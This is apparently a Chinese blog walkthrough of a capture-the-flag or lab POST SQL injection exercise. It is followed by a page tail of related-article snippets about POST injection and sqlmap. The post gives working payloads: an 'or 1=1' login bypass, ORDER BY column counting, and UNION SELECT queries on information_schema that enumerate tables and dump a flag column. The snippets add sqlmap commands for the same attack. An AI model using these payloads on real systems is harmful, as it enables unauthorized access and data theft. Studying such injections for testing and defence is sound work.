POST 注入

最新推荐文章于 2024-05-21 08:03:35 发布
最新推荐文章于 2024-05-21 08:03:35 发布
阅读量4k 收藏
点赞数 2
文章标签: web安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangyunming666/article/details/123618347
版权

首先我们看到页面要判断是否存在注入,随便输入账户名和密码 admin 123456

由提示的语句可以看出前面面的双引号需要闭合不然方框里的语句会当作字符串来执行 用 – qwe将后面的语句注释掉,我们用万能密码测试的到账户名、密码是正确的。
") or 1=1 -- qwe

对字段进行判断 order by ; order by 1;2;3; 页面都是正常回显,只有到order by 4 时页面报错,说明存在3个字段
接着我们来判断显错位,发现 2,3 是显错位我们在对表明进行查询,查出有 flag、user表
 ") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 -- pwd"

接着我在flag、user中的查字段名
得出flag、表中有id、flag字段。
 ") union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=flag limit 0,1 -- pwd"

接着我们查询flag表中flag字段中的内容 ")

 

 

")union select 1,2,flag from flag limit 1,1 -- qwe


最后的出flag 值

 

 

 

 

 

 

晨辰.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pangolin穿山甲SQL注入工具
12-03
**Pangolin穿山甲SQL注入工具**是一种广泛用于网络安全测试和漏洞评估的专业软件,尤其在网站渗透测试领域中有着重要应用。该工具的主要功能是针对目标系统进行SQL(Structured Query Language)注入攻击,以此来...
post注入
Alonegrief的博客
12-04 356
使用sqlmap进行post注入 拿sqli靶场来做例子(第十一关) 打开的时候看到输入账户和密码框,那我们机随便输入,然后利用burpsuite来抓包,对抓到的包复制到txt文件保存,打开sqlmap工具再输入命令的窗口里面输入 Sqlmap.py –r “这里是你保存txt文件的路径(绝对路径)” ,这样子就看到了一些post注入的一些注入类型了 接着跟着之前关卡使用的命令一样: -dbs 爆数据库 -D 指定数据库名 -tables 爆表名 -T 指定数据库列名 -columns 爆字段 -C 指
封神台SQL注入-POST注入
qq_40941912的博客
08-24 832
一、原理 判断注入点 判断当前页面字段总数 判断显示位 查当前数据库 查表名 查列名 查字段内容 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 最经典的POST注入莫过于万能密码:'or 1=1# Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 inf
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 899
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
实验:学习POST注入
茶花语的博客
02-25 6303
基于POST请求的SQL注入
POST注入
qq_45031509的博客
04-15 2674
POST注入 ①除了在url中体提交,也可以在网页输入上提交,如果需要与数据库连接的话就可能会存在注入,数据需要抓包才能看见。 ② 产生的地方,多半出现在登录框,查询框,等各种和数据库有交互的框数据。 ③提交方式,与参数类型(单引号,双引号的干扰) 案列(实验环境,SQlilabs 十一关) 1)抓包结果可以看出,账户,密码的提交方式,猜测可能有注入点 2)判断注入为字符型注入 3)猜测字段数为2 4)联合查询,查询数据库名与数据库用户 SELECT username, password FR
POST注入(一)
qq_45300786的博客
07-04 9041
POST(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-05/index.php 攻击流程:     1;判断是否存在sql注入漏洞。     2;判断网页存在字段数。     3;判断回显点。     4;获取信息。   测试开始:     测试目标获取管理员账号密码 GET/POST 区别: GET传参的数据有限,比较少 POST传参的数据可以比较大 可以达到很多效果 —— 文件上传 GET传参会经过URL编码 POST不会URL编码,比如注释符号:#的UR
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
第十二节 POST update语句注入-01
09-15
"POST update语句注入" 在数据库安全领域中,SQL 注入是一种常见的攻击方式,而在 Web 应用程序中,POST 请求也可能存在 SQL 注入漏洞。今天我们将讨论 POST update 语句注入的相关知识点。 MySQL update 介绍 ...
SQLMAP的注入使用
05-13
该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * python sqlmap.py -u "xxxxxxx.com" --dbs 【获取数据库内所有数据库的名称】 该命令用于获取目标网站的所有数据库的名称。 * python sqlmap.py...
post注入方法
ljj123_的博客
10-09 1416
get请求方式的sql注入通过sqlmap -u url+参数 完成 而post方式url中不包含参数,故使用如下方法进行 1、使用burpSite拦截post请求 2、将请求发送到repeater中 3、将请求复制到file 4、执行语句 sqlmap -r 上一步骤保存的文件名 备注:get 请求也可以通过post的方式 来操作 ...
post注入、报错注入学习笔记
XiaoXiao_RenHe的专栏
04-24 2873
post注入、报错注入学习笔记
SQL实战post注入DVWA
weixin_44689834的博客
05-20 697
1.首先搭建好自己本地的DVWA,进入DVWA并登录,将安全级别调至low 2.使用burpsuite打开拦截,浏览器设置本地代理进行抓包,在sql injection页面userID输入并enter 3.没有发现数据包emmm 4.百度了一哈发现需要把localhost改为自己本地IP地址 5.改了之后重新进入DVWA将安全等级设为low,进入SQL injection页面输入1回车 6.返回burpsuite查看是否抓到了 抓取数据包成功 7.将抓取到的数据包复制为TXT文件 我命名为1.txt
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4965
SQL注入原理-POST注入
post注入
quan9i的博客
01-04 5158
post注入(sql-lab11-18)
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
渗透测试基础-POST注入
weixin_45488495的博客
04-08 2118
渗透测试基础-POST注入POST注入是什么POST注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! POST注入是什么 post是一种传参方式,大多出现在各种框处,比如登录框,查询框,和各种与数据库有交互的框。 注入攻击是:用户输入的数据当作代码执行,这里有两个关键点 关键点一:用户能够控制输入 关键点二:原本程序要执行的代码,拼接了用户输入的数据 post注入与get注入没有本质的区别,无非就是一个在表单框执
sqlmap post注入方法
09-20
sqlmap是一种常用的自动化SQL注入工具,可以用于测试和发现应用程序中的SQL注入漏洞。在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` 2. 使用`--data`参数指定POST请求的数据,例如:`--data "n=1&p=1"` 3. 输入命令`sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"`来执行注入攻击 请注意,这只是一个简单的示例,实际使用时可能需要根据具体情况进行参数的调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值